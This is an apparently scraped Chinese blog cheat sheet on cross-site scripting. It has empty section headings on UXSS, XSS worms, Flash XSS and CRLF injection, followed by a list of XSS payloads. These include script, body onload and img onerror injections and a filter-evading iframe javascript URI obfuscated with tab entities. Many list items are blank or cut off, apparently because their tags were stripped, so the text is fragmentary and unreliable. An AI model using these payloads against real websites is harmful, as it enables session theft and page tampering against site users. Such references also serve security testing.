xss

UXSS
XSS蠕虫
rookit xss
Flash Xss
CRLF注入在响应头会导致XSS
使用场景
  • 直接嵌入html: <script> alert('XSS');</script>
  • 元素标签事件: <body onload=alert('xss')>
  • 图片标签: <img src="javascript:alert('xss');">
  • 其他标签: <iframe>,<div>,<link>
  • DOM对象,篡改页面内容
可以执行js的标签
  • //prompt和confirm也可以弹窗
  • //可以用”/“来代替单引号和双引号
  • //可以用char进行编码
  • // “.source”不会影响alert(7)的执行
  • //输出在timeout的情况
  • M

    //p标签的利用
  • <img src ?itworksonchrome?\/onerror = alert(1)> //只在chrome下有效
  • //只在chrome下有效








































  • test
  • <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  • //只有在crossdomain.xml文件中,allow-access-from domain=“”允许从外部调用swf时,我们才可以通过flash来实现xss attack.
  • //chrome
  • //firefox
  • //chrome有效
  • CLICKME
  • test1
  • <maction actiontype=”statusline#http://wangnima.com”
  • xlink:href=”javascript:alert(49)”>CLICKME
  • \将ascii转换为字符串
文章目录
  1. 1. UXSS
  2. 2. XSS蠕虫
  3. 3. rookit xss
  4. 4. Flash Xss
  5. 5. CRLF注入在响应头会导致XSS
  6. 6. 使用场景
    1. 6.1. 可以执行js的标签
,